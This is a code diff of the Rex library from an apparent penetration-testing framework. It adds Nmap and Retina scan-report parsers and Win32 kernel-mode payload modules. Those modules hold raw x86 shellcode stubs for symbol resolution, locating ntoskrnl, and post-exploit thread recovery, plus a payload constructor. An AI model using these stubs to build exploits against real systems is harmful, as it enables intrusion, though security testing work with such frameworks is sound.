librex 0.0.20 → 0.0.21

data/lib/rex/parser/nmap_xml.rb

@@ -0,0 +1,137 @@
+
+require 'rexml/document'
+
+module Rex
+module Parser
+
+#
+# Stream parser for nmap -oX xml output
+#
+# Yields a hash representing each host found in the xml stream.  Each host
+# will look something like the following:
+#	{
+#		"status" => "up",
+#		"addrs"  => { "ipv4" => "192.168.0.1", "mac" => "00:0d:87:a1:df:72" },
+#		"ports"  => [
+#			{ "portid" => "22", "state" => "closed", ... },
+#			{ "portid" => "80", "state" => "open", ... },
+#			...
+#		]
+#	}
+#
+# Usage:
+#   parser = NmapXMLStreamParser.new { |host|
+#     # do stuff with the host
+#   }
+#   REXML::Document.parse_stream(File.new(nmap_xml), parser)
+# -- or --
+#   parser = NmapXMLStreamParser.new
+#   parser.on_found_host = Proc.new { |host|
+#     # do stuff with the host
+#   }
+#   REXML::Document.parse_stream(File.new(nmap_xml), parser)
+#
+# This parser does not maintain state as well as a tree parser, so malformed
+# xml will trip it up.  Nmap shouldn't ever output malformed xml, so it's not
+# a big deal.
+#
+class NmapXMLStreamParser
+
+	#
+	# Callback for processing each found host
+	#
+	attr_accessor :on_found_host
+
+	#
+	# Create a new stream parser for NMAP XML output
+	#
+	# If given a block, it will be stored in +on_found_host+, otherwise you
+	# need to set it explicitly, e.g.:
+	#   parser = NmapXMLStreamParser.new
+	#   parser.on_found_host = Proc.new { |host|
+	#     # do stuff with the host
+	#   }
+	#   REXML::Document.parse_stream(File.new(nmap_xml), parser)
+	#
+	def initialize(&block)
+		reset_state
+		on_found_host = block if block
+	end
+
+	def reset_state
+		@host = { "status" => nil, "addrs" => {}, "ports" => [] }
+	end
+
+	def tag_start(name, attributes)
+		case name
+		when "address"
+			@host["addrs"][attributes["addrtype"]] = attributes["addr"]
+			if (attributes["addrtype"] =~ /ipv[46]/)
+				@host["addr"] = attributes["addr"]
+			end
+		when "osclass"
+			@host["os_vendor"]   = attributes["vendor"]
+			@host["os_family"]   = attributes["osfamily"]
+			@host["os_version"]  = attributes["osgen"]
+			@host["os_accuracy"] = attributes["accuracy"]
+		when "osmatch"
+			if(attributes["accuracy"].to_i == 100)
+				@host["os_match"] = attributes["name"]
+			end
+		when "uptime"
+			@host["last_boot"]   = attributes["lastboot"]
+		when "hostname"
+			if(attributes["type"] == "PTR")
+				@host["reverse_dns"] = attributes["name"]
+			end
+		when "status"
+			# <status> refers to the liveness of the host; values are "up" or "down"
+			@host["status"] = attributes["state"]
+			@host["status_reason"] = attributes["reason"]
+		when "port"
+			@host["ports"].push(attributes)
+		when "state"
+			# <state> refers to the state of a port; values are "open", "closed", or "filtered"
+			@host["ports"].last["state"] = attributes["state"]
+		when "service"
+			# Store any service and script info with the associated port.  There shouldn't
+			# be any collisions on attribute names here, so just merge them.
+			@host["ports"].last.merge!(attributes)
+		when "script"
+			@host["ports"].last["scripts"] ||= {}
+			@host["ports"].last["scripts"][attributes["id"]] = attributes["output"]
+		when "trace"
+			@host["trace"] = {"port" => attributes["port"], "proto" => attributes["proto"], "hops" => [] }
+		when "hop"
+			if @host["trace"]
+				@host["trace"]["hops"].push(attributes)
+			end
+		end
+	end
+
+	def tag_end(name)
+		case name
+		when "host"
+			on_found_host.call(@host) if on_found_host
+			reset_state
+		end
+	end
+
+	# We don't need these methods, but they're necessary to keep REXML happy
+	def text(str) # :nodoc:
+	end
+	def xmldecl(version, encoding, standalone) # :nodoc:
+	end
+	def cdata # :nodoc:
+	end
+	def comment(str) # :nodoc:
+	end
+	def instruction(name, instruction) # :nodoc:
+	end
+	def attlist # :nodoc:
+	end
+end
+
+end
+end
+

data/lib/rex/parser/retina_xml.rb

@@ -0,0 +1,109 @@
+module Rex
+module Parser
+
+# XXX - Retina XML does not include ANY service/port information export
+class RetinaXMLStreamParser
+
+	attr_accessor :on_found_host
+
+	def initialize(on_found_host = nil)
+		reset_state
+		self.on_found_host = on_found_host if on_found_host
+	end
+
+	def reset_state
+		@state = :generic_state
+		@host  = { 'vulns' => [] }
+		reset_audit_state
+	end
+	
+	def reset_audit_state
+		@audit = { 'refs' => [] }
+	end
+
+	def tag_start(name, attributes)
+		@state = "in_#{name.downcase}".intern
+	end
+
+	def text(str)
+		case @state
+		when :in_ip
+			@host["address"] = str
+		when :in_dnsname
+			@host["hostname"] = str.split(/\s+/).first
+		when :in_netbiosname
+			@host["netbios"] = str
+		when :in_mac
+			@host["mac"] = str
+		when :in_os
+			@host["os"] = str
+		when :in_rthid
+			@audit['refs'].push(['RETINA', str])
+		when :in_cve
+			str.split(",").each do |cve|
+				cve = cve.to_s.strip
+				next if cve.empty?
+				pre,val = cve.split('-', 2)
+				next if not val
+				next if pre != "CVE"
+				@audit['refs'].push( ['CVE', val] )
+			end
+		when :in_name
+			@audit['name'] = str
+		when :in_description
+			@audit['description'] = str
+		when :in_risk
+			@audit['risk'] = str
+		when :in_cce
+			@audit['cce'] = str
+		when :in_date
+			@audit['data'] = str
+		end
+	end
+
+	def tag_end(name)
+		case name
+		when "host"
+			on_found_host.call(@host) if on_found_host
+			reset_state
+		when "audit"
+			@host['vulns'].push @audit
+			reset_audit_state
+		end
+	end
+
+	# We don't need these methods, but they're necessary to keep REXML happy
+	def xmldecl(version, encoding, standalone); end
+	def cdata; end
+	def comment(str); end
+	def instruction(name, instruction); end
+	def attlist; end
+end
+end
+end
+
+__END__
+<scanJob>
+	<hosts>
+		<host>
+			<ip>10.2.79.98</ip>
+			<netBIOSName>bsmith-10156B07C</netBIOSName>
+			<dnsName>bsmith-10156b07c.core.testcorp.com  random.testcorp.com</dnsName>
+			<mac>00:02:29:0E:38:2B</mac>
+			<os>Windows Server 2003 (X64), Service Pack 2</os>
+			<audit>
+				<rthID>7851</rthID>
+				<cve>CVE-2009-0089,CVE-2009-0550,CVE-2009-0086</cve>
+				<cce>N/A</cce>
+				<name>Microsoft Windows HTTP Services Multiple Vulnerabilities (960803)</name>
+				<description>Microsoft Windows HTTP Services contains multiple vulnerabilities when handling ..</description>
+				<date>09/15/2010</date>
+				<risk>Low</risk>
+				<pciLevel>5 (Urgent)</pciLevel>
+				<cvssScore>10 [AV:N/AC:L/Au:N/C:C/I:C/A:C]</cvssScore>
+				<fixInformation>....</fixInformation>
+			</audit>
+		</host>
+	</hosts>
+</scanJob>		
+

data/lib/rex/payloads.rb

@@ -0,0 +1 @@
+require 'rex/payloads/win32'

data/lib/rex/payloads/win32.rb

@@ -0,0 +1,2 @@
+require 'rex/payloads/win32/common'
+require 'rex/payloads/win32/kernel'

data/lib/rex/payloads/win32/common.rb

@@ -0,0 +1,26 @@
+module Rex
+module Payloads
+module Win32
+
+module Common
+
+	#
+	# Returns a stub that resolves the location of a symbol and then
+	# calls it.  Refer to the following link for more details:
+	#
+	# http://uninformed.org/index.cgi?v=3&a=4&p=10
+	#
+	def self.resolve_call_sym
+		"\x60\x31\xc9\x8b\x7d\x3c\x8b\x7c\x3d\x78\x01\xef\x8b" +
+		"\x57\x20\x01\xea\x8b\x34\x8a\x01\xee\x31\xc0\x99\xac" +
+		"\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x41\x66\x39\xda" +
+		"\x75\xe3\x49\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" +
+		"\x5f\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" +
+		"\x61\xff\xe0"
+	end
+
+end
+
+end
+end
+end

data/lib/rex/payloads/win32/kernel.rb

@@ -0,0 +1,53 @@
+module Rex
+module Payloads
+module Win32
+
+require 'rex/payloads/win32/kernel/common'
+require 'rex/payloads/win32/kernel/recovery'
+require 'rex/payloads/win32/kernel/stager'
+require 'rex/payloads/win32/kernel/migration'
+
+module Kernel
+
+	#
+	# Constructs a kernel-mode payload using the supplied options.  The options
+	# can be:
+	#
+	# Recovery      : The recovery method to use, such as 'spin'.
+	# Stager        : The stager method to use, such as 'sud_syscall_hook'.
+	# RecoveryStub  : The recovery stub that should be used, if any.
+	# UserModeStub  : The user-mode payload to execute, if any.
+	# KernelModeStub: The kernel-mode payload to execute, if any.
+	#
+	def self.construct(opts = {})
+		payload = nil
+
+		# Generate the recovery stub
+		if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
+			opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
+		end
+
+		# Append supplied recovery stub information in case there is some
+		# context specific recovery that must be done.
+		if opts['AppendRecoveryStub']
+			opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
+		end
+
+		# Generate the stager
+		if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
+			payload = Kernel::Stager.send(opts['Stager'], opts)
+		# Or, generate the migrator
+		elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
+			payload = Kernel::Migration.send(opts['Migrator'], opts)
+		else
+			raise ArgumentError, "A stager or a migrator must be specified."
+		end
+
+		payload
+	end
+
+end
+
+end
+end
+end

data/lib/rex/payloads/win32/kernel/common.rb

@@ -0,0 +1,54 @@
+module Rex
+module Payloads
+module Win32
+module Kernel
+
+require 'rex/payloads/win32/common'
+
+#
+# This class provides common methods that may be shared across more than
+# one kernel-mode payload.  Many of these are from the following paper:
+#
+# http://www.uninformed.org/?v=3&a=4&t=sumry
+#
+module Common
+
+	#
+	# Returns a stub that will find the base address of ntoskrnl and
+	# place it in eax.  This method works by using an IDT entry.  Credit
+	# to eEye.
+	#
+	def self.find_nt_idt_eeye
+		"\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
+	end
+
+	#
+	# Returns a stub that will find the base address of ntoskrnl and 
+	# place it in eax.  This method uses a pointer found in KdVersionBlock.
+	#
+	def self.find_nt_kdversionblock
+		"\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
+	end
+
+	#
+	# Returns a stub that will find the base address of ntoskrnl and 
+	# place it in eax.  This method uses a pointer found in the
+	# processor control region as a starting point.
+	#
+	def self.find_nt_pcr
+		"\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
+	end
+
+	#
+	# Alias for resolving symbols.
+	#
+	def self.resolve_call_sym
+		Rex::Payloads::Win32::Common.resolve_call_sym
+	end
+
+end
+
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/migration.rb

@@ -0,0 +1,12 @@
+module Rex
+module Payloads
+module Win32
+module Kernel
+
+module Migration
+end
+
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/recovery.rb

@@ -0,0 +1,50 @@
+module Rex
+module Payloads
+module Win32
+module Kernel
+
+#
+# Recovery stubs are responsible for ensuring that the kernel does not crash.
+# They must 'recover' after the exploit has succeeded, either by consuming
+# the thread or continuing it on with its normal execution.  Recovery stubs
+# will often be exploit dependent.
+#
+module Recovery
+
+	#
+	# The default recovery method is to spin the thread
+	#
+	def self.default(opts = {})
+		spin(opts)
+	end
+
+	#
+	# Infinite 'hlt' loop.
+	#
+	def self.spin(opts = {})
+		"\xf4\xeb\xfd" 
+	end
+
+	#
+	# Restarts the idle thread by jumping back to the entry point of
+	# KiIdleLoop.  This requires a hard-coded address of KiIdleLoop.
+	# You can pass the 'KiIdleLoopAddress' in the options hash.
+	#
+	def self.idlethread_restart(opts = {})
+		# Default to fully patched XPSP2
+		opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
+
+		"\x31\xC0" +                                     # xor eax,eax
+		"\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
+		"\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
+		"\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
+		"\x6A\x00" +                                     # push byte +0x0
+		"\xFF\xE0"                                       # jmp eax
+	end
+
+end
+
+end
+end
+end
+end